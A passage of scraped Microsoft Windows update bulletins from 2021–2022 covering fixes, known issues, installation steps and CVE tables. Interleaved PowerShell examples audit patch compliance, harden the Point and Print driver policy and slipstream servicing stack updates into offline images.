 * [NTLM authentication](<https://docs.microsoft.com/troubleshoot/windows-server/windows-security/ntlm-user-authentication>) through an external trust is unsuccessful when serviced by a domain controller that has the January 11, 2022 or later Windows update installed. This issue occurs if the DC is in a non-root domain and does not hold the [global catalog](<https://docs.microsoft.com/windows/win32/ad/global-catalog>) (GC) role. Impacted operations may log the following errors:
   * The security database has not been started.
   * The domain was in the wrong state to perform the security operation.
   * 0xc00000dd (STATUS_INVALID_DOMAIN_STATE)
 * Applications might not run after an AppLocker publisher rule is deployed.
 * Addresses a known issue that might prevent you from using the Wi-Fi hotspot feature. When attempting to use the hotspot feature, the host device might lose the connection to the Internet after a client device connects.
 * Addresses a known issue in which Windows Servers that use the Routing and Remote Access Service (RRAS) might be unable to correctly direct Internet traffic. Devices which connect to the server might not connect to the Internet, and servers can lose connection to the Internet after a client device connects.

For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [July 2022 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>).

## **Known issues in this update**

**Symptom**| **Next step** 
---|--- 
Certain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error “STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)”. This occurs when you perform the operation on a CSV owner node from a process that doesn’t have administrator privilege.| Do one of the following: perform the operation from a process that has administrator privilege, or perform the operation from a node that doesn’t have CSV ownership. We are working on a resolution and will provide an update in an upcoming release. 

## **How to get this update**

**Before installing this update**

We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).

If you use Windows Update, the latest SSU ([KB5016264](<https://support.microsoft.com/help/5016264>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).

**Install this update**

**Release Channel**| **Available**| **Next Step** 
---|---|--- 
Windows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. 
Microsoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5015874>) website. 
Windows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro. **Classification**: Security Updates. 

## **File information**

For a list of the files that are provided in this update, download the [file information for update 5015874](<https://download.microsoft.com/download/8/6/e/86eb07bd-caad-4045-ab27-08b4eb12d28a/5015874.csv>). 
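
Both July 12, 2022 bulletins for Windows 8.1 and Windows Server 2012 R2 (KB5015877 Security-only and KB5015874 Monthly Rollup) describe the same prerequisite chain: the servicing stack update KB5016264 first, then either the Monthly Rollup or the Security-only update, the latter only together with the Internet Explorer cumulative update KB5015805. The PowerShell script below is an added example, not part of either KB article, that audits a list of hosts against that chain using the KB numbers named in the bulletins. It assumes Get-HotFix (which reads Win32_QuickFixEngineering) lists the installed packages, that remote hosts accept CIM and WMI from an elevated session, and that the caller supplies, through the -LaterRollups parameter (this example's own), the KB numbers of any newer Monthly Rollups that supersede KB5015874 on hosts that skipped the July release.

```powershell
# Added example, not from the KB articles: audit Windows 8.1 / Server 2012 R2 hosts for the
# July 12, 2022 update chain (SSU -> Monthly Rollup, or Security-only + IE cumulative update).
# Assumptions: Get-HotFix (Win32_QuickFixEngineering) sees the installed packages, remote hosts
# accept WMI/CIM, and the session is elevated. KB numbers are the ones named in the bulletins.
param(
    [string[]] $ComputerName = @($env:COMPUTERNAME),
    # Newer Monthly Rollups supersede KB5015874; pass their KB numbers so such hosts are not
    # reported as missing the July fix set (assumption: the caller knows which ones they deploy).
    [string[]] $LaterRollups = @()
)

$Ssu           = 'KB5016264'   # servicing stack update, install first
$MonthlyRollup = 'KB5015874'   # cumulative Monthly Rollup
$SecurityOnly  = 'KB5015877'   # Security-only; needs all prior Security-only updates as well
$IeCumulative  = 'KB5015805'   # IE cumulative update required with the Security-only chain
$EndOfSupport  = Get-Date '2023-01-10'

function Test-JulyUpdateChain {
    param([Parameter(Mandatory)] [string] $Computer)

    $os = Get-CimInstance -ClassName Win32_OperatingSystem -ComputerName $Computer
    # Windows 8.1 and Windows Server 2012 R2 both report kernel version 6.3.x.
    if (-not $os.Version.StartsWith('6.3')) {
        return [pscustomobject]@{ Computer = $Computer; OS = $os.Caption; Status = 'not Windows 8.1 / Server 2012 R2, skipped' }
    }

    $installed  = @((Get-HotFix -ComputerName $Computer).HotFixID)
    $hasSsu     = $installed -contains $Ssu
    $hasRollup  = ($installed -contains $MonthlyRollup) -or
                  (@($LaterRollups | Where-Object { $installed -contains $_ }).Count -gt 0)
    $hasSecOnly = $installed -contains $SecurityOnly
    $hasIe      = $installed -contains $IeCumulative

    $findings = @()
    if (-not $hasSsu) {
        $findings += "SSU $Ssu missing (install before the rollup)"
    }
    if (-not ($hasRollup -or $hasSecOnly)) {
        $findings += "neither $MonthlyRollup nor $SecurityOnly installed (CVE-2022-22047 fix absent)"
    }
    if ($hasSecOnly -and -not $hasRollup -and -not $hasIe) {
        $findings += "Security-only chain without IE cumulative update $IeCumulative"
    }
    if ($os.Caption -match 'Windows 8.1' -and (Get-Date) -gt $EndOfSupport) {
        $findings += 'Windows 8.1 is past end of support (no ESU offered)'
    }

    $status = if ($findings.Count -eq 0) { 'compliant' } else { $findings -join '; ' }
    [pscustomobject]@{ Computer = $Computer; OS = $os.Caption; Status = $status }
}

$ComputerName | ForEach-Object { Test-JulyUpdateChain -Computer $_ } | Format-Table -AutoSize -Wrap
```

Run it from an elevated session as `.\Test-JulyUpdateChain.ps1 -ComputerName srv01, srv02 -LaterRollups <KB numbers of newer rollups you deploy>`. The check is deliberately literal about KB numbers, which is what Get-HotFix exposes; it does not read the Security Update Guide, so when Microsoft ships a newer rollup you extend -LaterRollups rather than the script.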

## **References**

For information about the security updates released on July 12, 2022, see [Deployments - Security Update Guide](<https://msrc.microsoft.com/update-guide/deployments>). Learn about the [standard terminology](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) that is used to describe Microsoft software updates.

**Bulletin**| **Published**| **CVEs addressed**| **CVSS v3.1 base**| **CVSS v2 base** 
---|---|---|---|--- 
[July 12, 2022—KB5015874 (Monthly Rollup)](<https://support.microsoft.com/en-us/help/5015874>)| 2022-07-12| CVE-2022-22047| 7.8 HIGH, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H| 7.2 HIGH, AV:L/AC:L/Au:N/C:C/I:C/A:C 

# August 10, 2021—KB5005031 (OS Build 18363.1734)

**6/15/21 IMPORTANT** This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. 
For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).

**11/19/20** For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1909 update history home page. **Note** Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.

## Highlights

 * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). 

## Improvements and fixes

This security update includes quality improvements. Key changes include:

 * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information. 
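
The Point and Print change above is a default, and KB5005652 (linked above but not quoted on this page) documents the registry value that can override it: `RestrictDriverInstallationToAdministrators` under `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint`, where 1 or absent means administrators only and 0 restores the pre-update behaviour that CVE-2021-34481 concerns. The script below is an added example, not part of the KB article, that reports which setting is in effect and writes the hardened value explicitly. It assumes an elevated session so the HKLM policy key is readable and writable; the function names are this example's own.

```powershell
# Added example, not from the KB article: audit and remediate the Point and Print driver
# installation policy whose default the August 2021 updates changed. Value name and path are
# from KB5005652: 1 or absent = administrators only (hardened default), 0 = any user may
# install drivers (pre-update behaviour, the CVE-2021-34481 exposure).
# Assumption: run in an elevated session so HKLM policy keys are readable and writable.

$PointAndPrintKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$ValueName        = 'RestrictDriverInstallationToAdministrators'

function Get-PointAndPrintDriverPolicy {
    # Absent key or absent value both mean the post-update default applies.
    $item  = Get-ItemProperty -Path $PointAndPrintKey -Name $ValueName -ErrorAction SilentlyContinue
    $value = if ($null -ne $item) { $item.$ValueName } else { $null }

    if ($null -eq $value) {
        $effective = 'administrators only (post-update default, value not set)'
        $weak      = $false
        $display   = '(not set)'
    } elseif ($value -eq 1) {
        $effective = 'administrators only (explicitly set)'
        $weak      = $false
        $display   = $value
    } elseif ($value -eq 0) {
        $effective = 'any user may install drivers (pre-update behaviour, CVE-2021-34481 exposure)'
        $weak      = $true
        $display   = $value
    } else {
        $effective = "unexpected value $value; treat as misconfigured"
        $weak      = $true
        $display   = $value
    }

    [pscustomobject]@{
        Computer  = $env:COMPUTERNAME
        Key       = $PointAndPrintKey
        Value     = $display
        Effective = $effective
        Weak      = $weak
    }
}

function Set-PointAndPrintDriverPolicy {
    # Remediation: write 1 explicitly rather than relying on absence, so a later script or
    # GPO that flips the value to 0 shows up as a change from 1 in registry auditing.
    if (-not (Test-Path -Path $PointAndPrintKey)) {
        New-Item -Path $PointAndPrintKey -Force | Out-Null
    }
    Set-ItemProperty -Path $PointAndPrintKey -Name $ValueName -Value 1 -Type DWord
}

$policy = Get-PointAndPrintDriverPolicy
$policy | Format-List
if ($policy.Weak) {
    Write-Warning "Point and Print driver installation is open to non-administrators on $env:COMPUTERNAME; run Set-PointAndPrintDriverPolicy to restore the default."
}
```

Treat a value of 0 as a finding even where it was set deliberately for printer compatibility: it re-enables the behaviour the update was shipped to close. In domain environments check the same value through the policy that writes it (KB5005652 documents a Group Policy setting for it), since a GPO refresh will overwrite a local remediation.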

If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.

**Windows Update Improvements** Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.

## Known issues in this update

**Symptom**| **Workaround** 
---|--- 
After installing this update, the Encrypting File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942. **Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. 

## How to get this update

**Before installing this update**

Prerequisite: You **must** install the July 13, 2021 servicing stack update (SSU) (KB5004748) or the latest SSU (KB5005412) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.

If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>).

**Install this update**

**Release Channel**| **Available**| **Next Step** 
---|---|--- 
Windows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. 
Windows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. 
Microsoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005031>) website. 
Windows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows 10, version 1903 and later. **Classification**: Security Updates. 

**File information** For a list of the files that are provided in this update, download the [file information for cumulative update 5005031](<https://download.microsoft.com/download/5/9/0/5901bffe-66e8-4289-9077-b87ae1af9813/5005031.csv>). 

**Bulletin**| **Published**| **CVEs addressed**| **CVSS v3.1 base**| **CVSS v2 base** 
---|---|---|---|--- 
[August 10, 2021—KB5005031 (OS Build 18363.1734)](<https://support.microsoft.com/en-us/help/5005031>)| 2021-08-10| CVE-2021-34481, CVE-2021-36942, CVE-2021-36948| 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H| 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P 

# August 10, 2021—KB5005033 (OS Builds 19041.1165, 19042.1165, and 19043.1165)

**6/15/21 IMPORTANT** This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. 
For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).

**11/17/20** For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). **Note** Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.

## Highlights

 * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). 

## Improvements and fixes

### Windows 10, version 21H1

This security update includes quality improvements. Key changes include:

 * This build includes all the improvements from Windows 10, version 2004.
 * No additional issues were documented for this release.

### Windows 10, version 20H2

This security update includes quality improvements. Key changes include:

 * This build includes all the improvements from Windows 10, version 2004.
 * No additional issues were documented for this release.

### Windows 10, version 2004

**Note:** This release also contains updates for Microsoft HoloLens (OS Build 19041.1159) released August 10, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.

This security update includes quality improvements. Key changes include:

 * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.

If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.

**Windows Update Improvements** Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.

### Windows 10 servicing stack update - 19041.1161, 19042.1161, and 19043.1161

 * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.

## Known issues in this update

**Symptom**| **Workaround** 
---|--- 
When using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually. **Note** The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. 
Devices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later. **Note** Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps.| To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package: (1) extract the cab from the msu (using the package for KB5000842 as an example) with `expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>`; (2) extract the SSU from the previously extracted cab with `expand Windows10.0-KB5000842-x64.cab /f:* <destination path>`; (3) you will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**; slipstream this file into your offline image first, then the LCU. If you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). 
After installing the June 21, 2021 (KB5003690) update, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message "PSFX_E_MATCHING_BINARY_MISSING".| For more information and a workaround, see KB5005322. 
After installing this update, the Encrypting File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942. **Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. 
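
The Edge Legacy workaround above is a three-step expand sequence followed by slipstreaming the SSU before the LCU. The script below is an added PowerShell example, not part of the KB article, that performs those steps against an offline image in that order and refuses to commit the image if no servicing-stack package is present afterwards. It assumes expand.exe and the DISM PowerShell module (Mount-WindowsImage, Add-WindowsPackage, Get-WindowsPackage, Dismount-WindowsImage) are available in an elevated session, that the .msu is a combined SSU and LCU package, that the nested SSU cab follows the SSU-*.cab naming shown in the page's example, and that the installed servicing-stack package name contains "ServicingStack"; the parameter names and default working directories are this example's own.

```powershell
# Added example, not from the KB article: script the three-step SSU extraction from the
# workaround and slipstream the SSU before the LCU into an offline image (the required order).
# Assumptions: expand.exe and the DISM PowerShell module are available (elevated session on
# Windows 10 or with the ADK), the .msu is a combined SSU+LCU package, the nested SSU cab is
# named SSU-*.cab as in the page's example (SSU-19041.903-x64.cab), and the installed
# servicing-stack package name contains "ServicingStack".
param(
    [Parameter(Mandatory)] [string] $MsuPath,    # e.g. .\Windows10.0-KB5000842-x64.msu
    [Parameter(Mandatory)] [string] $ImagePath,  # e.g. .\sources\install.wim
    [int]    $Index    = 1,
    [string] $WorkDir  = (Join-Path $env:TEMP 'ssu-split'),
    [string] $MountDir = (Join-Path $env:TEMP 'wim-mount')
)

$ErrorActionPreference = 'Stop'
New-Item -ItemType Directory -Force -Path $WorkDir, $MountDir | Out-Null

# Step 1: the .msu is a container; extract the inner .cab that shares its base name.
$cabName  = [IO.Path]::ChangeExtension((Split-Path -Path $MsuPath -Leaf), '.cab')
& expand.exe $MsuPath "/f:$cabName" $WorkDir | Out-Null
$outerCab = Join-Path $WorkDir $cabName

# Step 2: expand everything inside that cab; the SSU is one of the nested cabs.
& expand.exe $outerCab '/f:*' $WorkDir | Out-Null

# Step 3: locate the SSU cab (name pattern assumed from the page's example).
$ssuCab = Get-ChildItem -Path $WorkDir -Filter 'SSU-*.cab' | Select-Object -First 1
if (-not $ssuCab) { throw "No SSU-*.cab found inside $MsuPath; is it a combined SSU+LCU package?" }

Mount-WindowsImage -ImagePath $ImagePath -Index $Index -Path $MountDir | Out-Null
try {
    # SSU first, so the image's servicing stack can apply the LCU that follows.
    Add-WindowsPackage -Path $MountDir -PackagePath $ssuCab.FullName | Out-Null
    # Then the original package; offline servicing accepts the .msu directly.
    Add-WindowsPackage -Path $MountDir -PackagePath $MsuPath | Out-Null

    # Verify a servicing-stack package is present before committing the image.
    $ssu = Get-WindowsPackage -Path $MountDir | Where-Object PackageName -like '*ServicingStack*'
    if (-not $ssu) { throw 'No servicing-stack package in the mounted image after Add-WindowsPackage; discarding.' }

    Dismount-WindowsImage -Path $MountDir -Save | Out-Null
    Write-Output "Slipstreamed $($ssuCab.Name) then $(Split-Path -Path $MsuPath -Leaf) into $ImagePath (index $Index)."
}
catch {
    # Any failure leaves the image untouched rather than half-serviced.
    Dismount-WindowsImage -Path $MountDir -Discard | Out-Null
    throw
}
```

Run it once per image index you ship (`.\Slipstream-SsuFirst.ps1 -MsuPath .\Windows10.0-KB5000842-x64.msu -ImagePath .\sources\install.wim -Index 3`); install.wim files from media commonly hold several editions. The discard-on-failure path matters because a mounted image left with the LCU applied but no SSU reproduces exactly the condition the known issue describes.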

## How to get this update

**Before installing this update**

Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.

Prerequisite: For Windows Server Update Services (WSUS) deployment or when installing the standalone package from Microsoft Update Catalog: if your devices do not have the May 11, 2021 update (KB5003173) or later LCU, you **must** install the special standalone August 10, 2021 SSU (KB5005260).

**Install this update**

**Release Channel**| **Available**| **Next Step** 
---|---|--- 
Windows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. 
Windows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. 
Microsoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005033>) website. 
Windows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows 10, version 1903 and later. **Classification**: Security Updates. 

**If you want to remove the LCU** To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**. Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall** switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.

**File information** For a list of the files that are provided in this update, download the [file information for cumulative update 5005033](<https://download.microsoft.com/download/1/e/e/1eeb7268-cb6a-4865-a98b-9c51f0ec7beb/5005033.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1161, 19042.1161, and 19043.1161](<https://download.microsoft.com/download/f/7/4/f74513f3-7838-4538-89f5-8be86d571826/SSU_version_19041_1161.csv>). 

**Bulletin**| **Published**| **CVEs addressed**| **CVSS v3.1 base**| **CVSS v2 base** 
---|---|---|---|--- 
[August 10, 2021—KB5005033 (OS Builds 19041.1165, 19042.1165, and 19043.1165)](<https://support.microsoft.com/en-us/help/5005033>)| 2021-08-10| CVE-2021-34481, CVE-2021-36942, CVE-2021-36948| 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H| 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P 

# August 10, 2021 security update for Windows 10, version 1809

**6/15/21 IMPORTANT** This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).

**11/17/20** For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1809 update history home page.

**Note** This release also contains updates for Microsoft HoloLens (OS Build 17763.2114) released August 10, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.

## Highlights

 * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). 

## Improvements and fixes

This security update includes quality improvements. Key changes include:

 * Changes the default privilege requirement for installing drivers when using Point and Print. 
After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| This issue is addressed by updates released June 11, 2019 and later. We recommend you install the latest security updates for your device. Customers installing Windows Server 2019 using media should install the latest [Servicing Stack Update (SSU)](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) before installing the language pack or other optional components. 
If using the [Volume Licensing Service Center (VLSC)](<https://www.microsoft.com/licensing/servicecenter/default.aspx>), acquire the latest Windows Server 2019 media available. The proper order of installation is as follows:\n\n 1. Install the latest prerequisite SSU, currently [KB5005112](<https://support.microsoft.com/help/5005112>)\n 2. Install optional components or language packs\n 3. Install latest cumulative update\n**Note** Updating your device will prevent this issue, but will have no effect on devices already affected by this issue. If this issue is present in your device, you will need to use the workaround steps to repair it.**Workaround:**\n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/windows/manage-the-input-and-display-language-settings-in-windows-12a10cb4-8626-9b77-0ccb-5013e0c7c7a2>).\n 2. Click **Check for Updates **and install the April 2019 Cumulative Update or later. For instructions, see [Update Windows 10](<https://support.microsoft.com/windows/update-windows-3c5ae7fc-9fb6-9af1-1984-b5e0412c556a>).\n**Note **If reinstalling the language pack does not mitigate the issue, use the In-Place-Upgrade feature. For guidance, see [How to do an in-place upgrade on Windows](<https://docs.microsoft.com/troubleshoot/windows-server/deployment/repair-or-in-place-upgrade>), and [Perform an in-place upgrade of Windows Server](<https://docs.microsoft.com/windows-server/get-started/perform-in-place-upgrade>). \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. 
\nAfter installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942.**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. 
